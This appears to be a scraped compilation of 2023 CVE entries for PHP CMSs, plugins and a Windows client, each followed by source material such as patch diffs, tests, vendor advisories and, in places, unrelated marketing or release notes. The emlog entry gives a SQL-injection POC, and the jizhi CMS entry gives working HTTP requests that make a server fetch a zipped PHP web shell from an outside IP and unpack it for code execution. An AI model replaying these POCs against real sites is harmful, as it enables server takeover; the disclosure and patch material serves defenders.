The WP Ultimate CSV Importer plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 7.9.8 via the '->cus2' parameter. This allows authenticated attackers with author-level permissions or above, if the administrator previously grants access in the plugin settings, to create a PHP file and execute code on the server. The author resolved this vulnerability by removing the ability for authors and editors to import files, please note that this means php file creation is still allowed for site administrators, use the plugin with caution.

*   **wp-ultimate-csv-importer/trunk/wp-ultimate-csv-importer.php**
    
    r2943068
    
    r2944635
    
     
    
    112
    
    112
    
                if ( is\_user\_logged\_in() &&  current\_user\_can('manage\_options') ) {
    
    113
    
    113
    
                    add\_action('admin\_menu',array(\_\_CLASS\_\_,'testing\_function'));
    
    114
    
     
    
                }
    
    115
    
     
    
            }else{
    
    116
    
     
    
                if ( is\_user\_logged\_in() && ( current\_user\_can( 'edit\_published\_posts')) && (in\_array('editor',$role) || in\_array('author',$role)) && $ucisettings\['author\_editor\_access'\] == "true" ) {   
    
    117
    
     
    
                    add\_action('admin\_menu',array(\_\_CLASS\_\_,'editor\_menu'));
    
    118
    
    114
    
                }
    
    119
    
    115
    
            }
    
    …
    
    …
    
     
    
    386
    
    382
    
            $upload = wp\_upload\_dir();
    
    387
    
    383
    
            $upload\_dir = $upload\['basedir'\];
    
    388
    
     
    
            if(!is\_dir($upload\_dir)){
    
    389
    
     
    
                return false;
    
    390
    
     
    
            }else{
    
    391
    
     
    
                $upload\_dir = $upload\_dir . '/smack\_uci\_uploads/imports/';
    
    392
    
     
    
                if (!is\_dir($upload\_dir)) {
    
    393
    
     
    
                    wp\_mkdir\_p( $upload\_dir);
    
    394
    
     
    
                }
    
     
    
    384
    
                if(!is\_dir($upload\_dir)){
    
     
    
    385
    
                    return false;
    
     
    
    386
    
                }else{
    
     
    
    387
    
                    $upload\_dir = $upload\_dir . '/smack\_uci\_uploads/imports/';
    
     
    
    388
    
                    if (!is\_dir($upload\_dir)) {
    
     
    
    389
    
                        wp\_mkdir\_p($upload\_dir);
    
     
    
    390
    
                        chmod($upload\_dir, 0755);
    
     
    
    391
    
     
    
    392
    
                        $index\_php\_file = $upload\_dir . 'index.php';
    
     
    
    393
    
                        if (!file\_exists($index\_php\_file)) {
    
     
    
    394
    
                            $file\_content = '<?php' . PHP\_EOL . '?>';
    
     
    
    395
    
                            file\_put\_contents($index\_php\_file, $file\_content);
    
     
    
    396
    
                        }
    
     
    
    397
    
                    }
    
    395
    
    398
    
                if($mode != 'CLI')
    
    396
    
    399
    
                {
    
    397
    
    400
    
                    chmod($upload\_dir, 0777);
    
    398
    
    401
    
                }
    
    399
    
     
    
                $exports\_dir = $upload\['basedir'\] . '/smack\_uci\_uploads/exports/';
    
    400
    
     
    
            if (!is\_dir($exports\_dir)) {
    
     
    
    402
    
     
    
    403
    
                $exports\_dir = $upload\['basedir'\] . '/smack\_uci\_uploads/exports/';
    
     
    
    404
    
              if (!is\_dir($exports\_dir)) {
    
    401
    
    405
    
                wp\_mkdir\_p($exports\_dir);
    
    402
    
    406
    
                chmod($exports\_dir, 0755);
    
    …
    
    …
    
     
    
    407
    
    411
    
                    file\_put\_contents($index\_php\_file, $file\_content);
    
    408
    
    412
    
                }
    
     
    
    413
    
            }
    
     
    
    414
    
    409
    
    415
    
                return $upload\_dir;
    
    410
    
    416
    
            }
    
    411
    
    417
    
        }
    
    412
    
     
    
            if($mode != 'CLI')
    
    413
    
     
    
            {
    
    414
    
     
    
                chmod($upload\_dir, 0777);
    
    415
    
     
    
            }           
    
    416
    
     
    
            return $upload\_dir;
    
    417
    
     
    
        }
    
    418
    
     
    
     
    
    418
    
       
    
    419
    
    419
    
        public function delete\_image\_schedule()
    
    420
    
    420
    
        {
    
    …
    
    …
    
     
    
    508
    
    508
    
                loadbasic();
    
    509
    
    509
    
            }
    
    510
    
     
    
        }else{
    
    511
    
     
    
            if ( is\_user\_logged\_in() && ( current\_user\_can( 'edit\_published\_posts')) && (in\_array('editor',$role) || in\_array('author',$role)) && $ucisettings\['author\_editor\_access'\] == "true" ) {
    
    512
    
     
    
                loadbasic();
    
    513
    
     
    
            }
    
    514
    
    510
    
        }
    
    515
    
    511
    
    }

CVE-2023-4141: Changeset 2944635 for wp-ultimate-csv-importer/trunk/wp-ultimate-csv-importer.php – WordPress Plugin Repository

Sulu is an open-source PHP content management system based on the Symfony framework. It allows over the Admin Login form to detect which user (username, email) exists and which one do not exist. Sulu Installation not using the old Symfony 5.4 security System and previous version are not impacted by this Security issue. The vulnerability has been patched in version 2.5.10. 



@@ -0,0 +1,82 @@ <?php  
/\* \* This file is part of Sulu. \* \* (c) Sulu GmbH \* \* This source file is subject to the MIT license that is bundled \* with this source code in the file LICENSE. \*/  
namespace Sulu\\Bundle\\SecurityBundle\\Tests\\Functional\\Security;  
use Sulu\\Bundle\\TestBundle\\Testing\\SuluTestCase;  
class AuthenticationHandlerTest extends SuluTestCase { public function testLoginFail(): void { $client = $this\->createClient(\[\], \[ 'CONTENT\_TYPE' => 'application/json', 'HTTP\_ACCEPT' => 'application/json', 'HTTP\_X-Requested-With' => 'XMLHttpRequest', \]);  
$client\->request('POST', '/admin/login', \[\], \[\], \[\], '{"username": "not-existing-user", "password": "wrong"}');  
$response = $client\->getResponse(); $this\->assertHttpStatusCode(401, $response); $notExistUserContent = $response\->getContent();  
$this\->assertSame('{"message":"Invalid credentials."}', $notExistUserContent); }  
public function testLoginSuccess(): void { $client = $this\->createClient(\[\], \[ 'CONTENT\_TYPE' => 'application/json', 'HTTP\_ACCEPT' => 'application/json', 'HTTP\_X-Requested-With' => 'XMLHttpRequest', \]);  
$testUser = $this\->getTestUser();  
$client\->request('POST', '/admin/login', \[\], \[\], \[\], '{"username": "' . $testUser\->getUsername() . '", "password": "test"}');  
$response = $client\->getResponse(); $this\->assertHttpStatusCode(200, $response); $notExistUserContent = $response\->getContent();  
$this\->assertSame( '{"url":"\\/admin\\/","username":"test","completed":true,"twoFactorMethods":\["trusted\_devices"\]}', $notExistUserContent ); }  
public function testLoginFailExistUserHasSameMessageAsNotExist(): void { $client = $this\->createClient(\[\], \[ 'CONTENT\_TYPE' => 'application/json', 'HTTP\_ACCEPT' => 'application/json', 'HTTP\_X-Requested-With' => 'XMLHttpRequest', \]);  
$testUser = $this\->getTestUser();  
$client\->request('POST', '/admin/login', \[\], \[\], \[\], '{"username": "not-existing-user", "password": "wrong"}');  
$response = $client\->getResponse(); $this\->assertHttpStatusCode(401, $response); $notExistUserContent = $response\->getContent();  
$client\->request('POST', '/admin/login', \[\], \[\], \[\], '{"username": "' . $testUser\->getUsername() . '", "password": "wrong"}');  
$response = $client\->getResponse(); $this\->assertHttpStatusCode(401, $response); $existUserContent = $response\->getContent();  
$this\->assertSame($notExistUserContent, $existUserContent); $this\->assertSame('{"message":"Invalid credentials."}', $notExistUserContent); } }

CVE-2023-39343: Merge pull request from GHSA-wmwf-49vv-p3mr · sulu/sulu@5f6c98b

User enumeration is found in in PHPJabbers Cleaning Business Software 1.0. This issue occurs during password recovery, where a difference in messages could allow an attacker to determine if the user is valid or not, enabling a brute force attack with valid users.

CVE-2023-36141

ai-dev aitable before v0.2.2 was discovered to contain a SQL injection vulnerability via the component /includes/ajax.php.

**More info**

To familiarize yourself with what is done on the web, you have **visited** several sites in the **same field** as yours, and you have **realized** that all had a c**ommon point**, and not a good point, the **visual bland** and **standardized** that everyone uses, either for **lack of means** or **lack of creativity**, and suddenly you say that customers always see the same thing, and that their choice is therefore only on the prices.

So you are **tired** of the simple but **not very exciting** display of Prestashop, this technique will allow you on one hand to revive the **interest of visitors** to your site compared to competitors, which can cause a purchase even if your rates are a little above those practiced in the area, but you can also look to put important information **more visible** and especially to distinguish yourself from the competition by adding a **more ergonomic** and **fun display** for you customers.

**Simplify the display of some attributes** and make understanding of these **simplest to your customers** is exactly what provides the **attribute display in a table module**.

At a glance, the **prices of both attributes are visible** to the customer and his **choice is simplified**, no need to go through the different attribute values to get a purchase price.

This module allows to define two attributes that will be displayed as a table.

The first attribute (the one displayed in columns) can be a delay attribute for **delivery for** **example** in this case you can determine the days to be taken into account for the calculation of delivery time, public holidays are automa

tically taken into account.

**The module is fully skinnable.**  

Links to download the documentations of the module are available at the bottom of the page.

**Prestashop compatible v****ersions**

1.6 & 1.7

**module** **version**

0.2.2

Demo url

**Download**

CVE-2023-33665: Ergonomie : Table attributes

emlog v2.1.9 was discovered to contain a SQL injection vulnerability via the component /admin/user.php.

1.  First log in to the administrator's background home page, find System -> Data -> Click Start Backup, first get an sql file  
    http://127.0.0.1/emlog/admin/data.php
2.  Modify the sql file and add a line of code to the user table of the database

POC:  
INSERT INTO emlog\_user VALUES('110','','$P$BnTaZnToynOoAVP6T/MiTsZc9ZAQNg.',(select user()),'writer','n','','123@qq.com','','','0','1687261845','1687261845');  
3\. Save the sql file - > and then select Import sql file, select the modified sql file just now, click Import, if successful, the import success will be displayed, and then click User module  
http://127.0.0.1/emlog/admin/user.php, you'll find the SQL statement is executed successfully

CVE-2023-39121: There is sql injection in the background of emlog 2.1.9. · Issue #1 · safe-b/CVE

ai-dev aioptimizedcombinations before v0.1.3 was discovered to contain a SQL injection vulnerability via the component /includes/ajax.php.

In the module “Customization fields fee for your store” (aioptimizedcombinations) for PrestaShop, an attacker can perform a SQL injection up to 0.1.2. Release 0.1.3 fixed this security issue.

**Summary**

*   **CVE ID**: CVE-2023-33666
*   **Published at**: 2023-08-03
*   **Advisory source**: Friends-Of-Presta.org
*   **Platform**: PrestaShop
*   **Product**: aioptimizedcombinations
*   **Impacted release**: <= 0.1.2 (0.1.3 fixed issue)
*   **Product author**: ai-dev
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

Up to 0.1.3, a sensitive SQL call in file includes/ajax.php can be executed with a trivial http call and exploited to forge a blind SQL injection throught the POST or GET submitted attributes variables.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Technical and personal data leaks
*   Obtain admin access
*   Remove all data of the linked PrestaShop
*   Display sensitives tables to front-office to unlock potential admin’s ajax scripts of modules protected by token on the ecosystem

**Patch**

    --- a/modules/aioptimizedcombinations/includes/ajax.php
    +++ b/modules/aioptimizedcombinations/includes/ajax.php
    switch (Tools::getValue('action'))
    {
    	case 'getCombination' :
    		/* If no product or combination, we quit */
    		if (!Tools::getIsset('product') || !Tools::getIsset('attributes'))
    			die();
    
    		$attributes = explode(',', Tools::getValue('attributes'));
    		
    		/* Get combination id */
    		$combination_data = Db::getInstance()->getRow(
    			'SELECT COUNT(*) as number, pa.id_product_attribute FROM '._DB_PREFIX_.'product_attribute AS pa LEFT JOIN '._DB_PREFIX_.'product_attribute_combination AS pac ON pa.id_product_attribute = pac.id_product_attribute WHERE pa.id_product = '.
    -			(int)Tools::getValue('product').' AND pac.id_attribute IN ('.pSQL(Tools::getValue('attributes')).') GROUP BY pa.id_product_attribute HAVING number = '.count($attributes)
    +			(int)Tools::getValue('product').' AND pac.id_attribute IN ('.implode(',', array_map('intval', explode(',', Tools::getValue('attributes')))).') GROUP BY pa.id_product_attribute HAVING number = '.count($attributes)
    		);
    

**Other recommandations**

*   Upgrade PrestaShop to the latest version to disable multiquery execution (separated by “;”) - be warned that this functionality **WILL NOT** protect your SHOP against injection SQL which uses the UNION clause to steal data.
*   Change the default database prefix ps_ by a new longer arbitrary prefix. Nevertheless, be warned that this is useless against blackhats with DBA senior skills because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against these set of rules.

**Timeline**

Date

Action

2023-05-08

Vunlnerability found during a audit by 202 ecommerce

2023-05-10

Contact the author

2023-05-12

The author confirm the issue and supply a fixed release

2023-05-12

Request a CVE ID

2023-08-03

Publication of this advisory

**Links**

*   Author product page
*   National Vulnerability Database

CVE-2023-33666: [CVE-2023-33666] Improper neutralization of a SQL parameter in aioptimizedcombinations from ai-dev module for PrestaShop

Fabasoft Cloud Enterprise Client 23.3.0.130 allows a user to escalate their privileges to local administrator.

################################################################################ # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # ################################################################################ # # Product: Fabasoft Cloud Enterprise Client # Vendor: Fabasoft # Vendor ID: PDO06614 # CSNC ID: CSNC-2023-002 # CVE ID: CVE-2023-32764 # Subject: Local Privilege Escalation # Risk: High # Effect: Locally exploitable # Authors: Tino Kautschke # Dennis Henke # Date: 08.05.2023 # ################################################################################ Introduction: ------------- The Fabasoft Cloud lets you create a digital business network for your company based on relationships of trust – for secure cross-company, transnational collaboration in the cloud. Fabasoft provides a native client that allows, for example, editing documents directly via the web client or synchronizing documents on the device. \[1-3\] Compass Security identified a local privilege escalation vulnerability, allowing a user on a system with the Fabasoft Cloud Enterprise Client installed, to escalate their privileges to local administrator. Affected: --------- Vulnerable (tested): \* Fabasoft Cloud Enterprise Client 23.3.0.130 / 23.3.130 Not vulnerable (tested): \* Fabasoft Cloud Enterprise Client 23.6.0.99 / 23.6.99 Not vulnerable (regarding vendor announcement): \* 23.4.0.66 and above \* 23.0.1.23 and above \* 22.9.0.75 and above \* 22.0.3.88 and above \* 21.1.3.204 and above Other products were affected (Windows only): Fabasoft Folio / eGov-Suite 2021 Update Rollup 3 Fabasoft Folio / eGov-Suite 2022 (up to Update Rollup 3 and Feature Track) Fabasoft Folio / eGov-Suite 2023 (up to Update Rollup 1) Fabasoft Cloud Technical Description: ---------------------- The Fabasoft Cloud Enterprise Client uses an update service named FabasoftCloudUS.exe, which is executed with SYSTEM privileges. On update, it looks for new update files in C:\\ProgramData\\fabasoft.plugin, which can be read and written to by arbitrary users. The update service expects a signed MSI file and an empty file with extension '.pending' in this folder to start the update process. The update mechanism after successful validation of a signed MSI file is vulnerable. It is possible to place a Fabasoft-signed MSI update or setup file to pass the validation check. After that, the MSI file will be renamed and handed over to the msiexec setup process. During this step, it is possible to re-rename the file and exchange it with an arbitrary MSI package. A commandline script can do the job and performs the renaming operations in a loop to exchange the MSI package once it is possible, before the update process will hand over the file to msiexec. The update process will produce some access errors first, because of the renaming operation, but it has some tolerance and retries to access the file. The exchanged malicious MSI package will be taken, handed over to msiexec and installed with SYSTEM privileges. This means that an unprivileged user can install arbitrary MSI packages, thus resulting in code execution with full SYSTEM permissions. This can be used, e.g., to start a reverse shell or execute other malicious commands. Workaround / Fix: ----------------- The processing of MSI packages during the update process should be revised to ensure, that it is not possible to exchange any packages originated from untrusted sources. A patch has already been released by the publisher. The update service should install update packages from a folder for which non-admin users do not have change or modify privileges. Microsofts guidelines and best-practices for MSI packages should be considered during development. In general, the update service should not run in a high privileged context like SYSTEM. It is recommended to set up a dedicated service user with neccessary privileges only. As a customer using the Fabasoft Cloud Enterprise Client, update your installation to the latest version. Workaround: disable Fabasoft Folio Client Update Service "folioupdate" or "folioupdatepm2X". Timeline: --------- 2023-05-08: Discovery by Tino Kautschke and Dennis Henke 2023-05-08: Initial vendor notification 2023-05-08: CVE number requested 2023-05-15: CVE number reserved: CVE-2023-32764 2023-06-09: Test of version 23.6.99, vulnerability has been fixed 2023-07-04: Last public vulnerability announcement by vendor (PDO06614) \[4\] 2023-08-02: Coordinated disclosure of the advisory References: ----------- \[1\] https://help.cloud.fabasoft.com/index.php?topic=doc/User-Help-Fabasoft-Cloud-eng/introduction.htm \[2\] https://help.cloud.fabasoft.com/index.php?topic=doc/Fabasoft-Cloud-Client/introduction.htm \[3\] https://help.cloud.fabasoft.com/index.php?topic=doc/Technical-Information-eng/the-fabasoft-cloud-enterprise-client.htm \[4\] https://help.supportservices.fabasoft.com/index.php?topic=doc/Vulnerabilities-Fabasoft-Folio/vulnerabilities-2023.htm#client-autoupdate-harmful-code-installation-vulnerability-pdo06614-

CVE-2023-32764

Cross Site Scripting vulnerability in Xoops CMS v.2.5.10 allows a remote attacker to execute arbitrary code via the category name field of the image manager function.

This version includes numerous improvements and fixes, including:

*   PHP 7.3 compatibility
*   MySQL 8.0 compatibility
*   XMF improvements for module writers
*   Security updates
*   Updated libraries
*   and many more fixes and updates

See the changelog for more details.

**Asset Checksums**

    SHA256 
    0947834f3943b9352ae3dc21235d83593a60948092c9490a54dbe02aa95202eb  XoopsCore25-2.5.10.tar.gz
    0de298a9680a7aad7627e786750ee6d0f084925f824175a59edeb7577f9cb6c6  XoopsCore25-2.5.10.zip
    
    MD5
    4765767d341826f175fd41831c49bba2  XoopsCore25-2.5.10.tar.gz
    9d5f77d0b3bfeb6a75e844a42a162a92  XoopsCore25-2.5.10.zip
    

Individual file checksums are available in XOOPS/xfilecheck

CVE-2023-36217: Release XOOPS Version 2.5.10 Final · XOOPS/XoopsCore25

An arbitrary file upload vulnerability in the /languages/install.php component of WBCE CMS v1.6.1 allows attackers to execute arbitrary code via a crafted PHP file.

CVE-2023-38947

An arbitrary file download vulnerability in the /c/PluginsController.php component of jizhi CMS 1.9.5 allows attackers to execute arbitrary code via downloading a crafted plugin.

  
Vulnerability lies in http://127.0.0.1/admin.php/Index/index.html  
Extension management at, download location for plugin list  
  
Click on any plugin of the cloud plugin to download  
Burp Suite Packet capture  
  
Can test parameters download\_url  
  
VPS enables HTTP service  
  
Zip compress phpshell.php and upload to VPS  
  
  
  
Successfully caused any file download  
POC:  
POST /admin.php/Plugins/update.html HTTP/1.1  
Host: 127.0.0.1  
Content-Length: 86  
Accept: application/json, text/javascript, _/_; q=0.01  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: http://127.0.0.1  
Referer: http://127.0.0.1/admin.php/Plugins/index.html  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09  
Connection: close

action=start-download&filepath=jzdesign&download\_url=http://119.91.26.244:8090/phpshell.zip

Vulnerability source code analysis:  
Global search for start-download to determine the location of file vulnerabilities  
The vulnerability is located in /A/c/PluginsController.php  
  
  
Line 739 starts with a case statement, followed by an fwrite write operation  
  
Located on line 718, its controllable point is $download\_ url, the path for writing has been provided on line 721, so why can I download any file? The cause of the vulnerability lies in  
  
Starting from line 883, it is the default file download URL, but causing a change after the controllable $download\_url on line 891, resulting in the vulnerability function being curl\_ exec, due to a vulnerability in the curl resource request code, it is possible to arbitrarily request external resources and cause arbitrary file downloads

The function point that can be decompressed is located in the case statement 'file-upzip' on line 776  
  
It will determine whether the file exists. If it exists, it will be saved in A/exts/, and the function will be called get\_zip\_orginalsize to start decompression work  
  
While loop to extract each file  
  
Successfully decompressed  
POC:  
POST /admin.php/Plugins/update.html HTTP/1.1  
Host: 127.0.0.1  
Content-Length: 32  
Accept: application/json, text/javascript, _/_; q=0.01  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: http://127.0.0.1  
Referer: http://127.0.0.1/admin.php/Plugins/index.html  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09  
Connection: close

action=file-upzip&filepath=jzdesign

Access path is http://127.0.0.1/A/exts/phpshell.php  
  
Successfully executing command causing RCE

CVE-2023-38948: jizhi CMS 1.9.5 has a Arbitrary File Download RCE  vulnerability via /A/c/PluginsController.php · Issue #I7LI4E · Pwn师傅/Pwn - Gitee.com

Tag

#php